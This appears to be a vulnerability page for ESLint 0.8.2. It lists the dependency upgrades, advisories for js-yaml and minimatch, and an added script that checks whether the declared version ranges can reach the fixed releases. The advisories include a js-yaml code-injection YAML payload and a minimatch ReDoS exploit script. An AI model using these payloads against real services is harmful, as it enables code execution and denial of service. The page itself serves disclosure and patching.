ESLint version 0.8.2 introduces several dependency updates and represents a minor but important upgrade for JavaScript developers using this popular linting tool. The core functionality, an Esprima-based pattern checker, remains consistent, ensuring a smooth transition for existing users. Key dependency upgrades include chalk (from ~0.4.0 to ~0.5.1), debug (from ^0.8.1 to ^2.0.0), esprima (from ^1.2.0 to ^1.2.2), js-yaml (from ~3.0.1 to ~3.2.2), doctrine (from ~0.5.0 to ^0.5.2), minimatch (from ~0.3.0 to ^1.0.0), estraverse (from ~1.3.0 to ~1.5.1) and object-assign (from ^0.3.1 to ^1.0.0). These updates likely incorporate bug fixes, performance improvements, and potentially new features within those dependencies, which translate to a more robust and efficient linting experience.
Developer toolchain updates are also present, notably in devDependencies. Highlights include shelljs (from ~0.2 to ^0.3.0), istanbul (from ~0.2.3 to ^0.3.2), jsonlint (from ~1.6.0 to ^1.6.2), phantomjs (from ~1.9.2-6 to ^1.9.9), browserify (from ~3.20.0 to ^5.11.2), dateformat (from ~1.0.7-1.2.3 to ^1.0.8), eslint-tester (from ^0.1.0 to ^0.2.1) and mocha-phantomjs (from ~3.3.1 to ~3.5.0). The updates to debug and esprima affect ESLint's core functionality. While these changes might not directly impact daily usage, staying current with these updates ensures compatibility and access to the latest tooling features for an optimized development workflow. Version 0.8.2 improves the foundation for JavaScript linting and code quality.
All the vulnerabilities related to the version 0.8.2 of the package
Denial of Service in js-yaml
Versions of js-yaml prior to 3.13.0 are vulnerable to Denial of Service. Parsing a carefully crafted YAML file stalls the node process and may exhaust system resources, leading to a Denial of Service.
Upgrade to version 3.13.0.
Code Injection in js-yaml
Versions of js-yaml prior to 3.13.1 are vulnerable to Code Injection. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have toString as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.
An example payload is
{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1
which returns the object
{
"1553107949161": 1
}
Upgrade to version 3.13.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  // declare the loop counter locally instead of leaking a global
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
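The js-yaml and minimatch advisories above each name a fixed release, while ESLint 0.8.2 declares js-yaml ~3.2.2 and minimatch ^1.0.0. The following added example (not code from this page, ESLint or npm) checks whether those declared ranges can ever resolve to a fixed release; the function names are hypothetical and only the ~ and ^ range forms used on this page are handled.

```javascript
// Added example (not ESLint or npm code). Supports only the ~x.y.z and
// ^x.y.z range forms that appear on this page.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(v);
  if (!m) throw new Error("unsupported version: " + v);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function compare(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Exclusive upper bound of a tilde or caret range (npm semver rules).
function upperBound(range) {
  const [maj, min, pat] = parseVersion(range.slice(1));
  if (range[0] === "~") return [maj, min + 1, 0];
  if (range[0] !== "^") throw new Error("unsupported range: " + range);
  if (maj > 0) return [maj + 1, 0, 0];
  return min > 0 ? [0, min + 1, 0] : [0, 0, pat + 1];
}

// True when the range admits at least one version >= the fixed release.
function rangeCanReach(range, fixed) {
  return compare(parseVersion(fixed), upperBound(range)) < 0;
}

// Declared ranges and fixed versions, both as stated on this page.
const declared = { "js-yaml": "~3.2.2", minimatch: "^1.0.0" };
const advisories = [
  { pkg: "js-yaml", issue: "Denial of Service", fixed: "3.13.0" },
  { pkg: "js-yaml", issue: "Code Injection", fixed: "3.13.1" },
  { pkg: "minimatch", issue: "ReDoS via pattern argument", fixed: "3.0.2" },
];

function audit(ranges, list) {
  return list.map((a) => ({ ...a, range: ranges[a.pkg],
    reachable: rangeCanReach(ranges[a.pkg], a.fixed) }));
}

for (const r of audit(declared, advisories)) {
  console.log(`${r.pkg} ${r.range}: ${r.issue}, fixed in ${r.fixed}: ` +
    (r.reachable ? "a reinstall can pick up the fix" : "range excludes the fix"));
}
```

All three advisories come back unreachable, so reinstalling ESLint 0.8.2 cannot pull in a fixed js-yaml or minimatch.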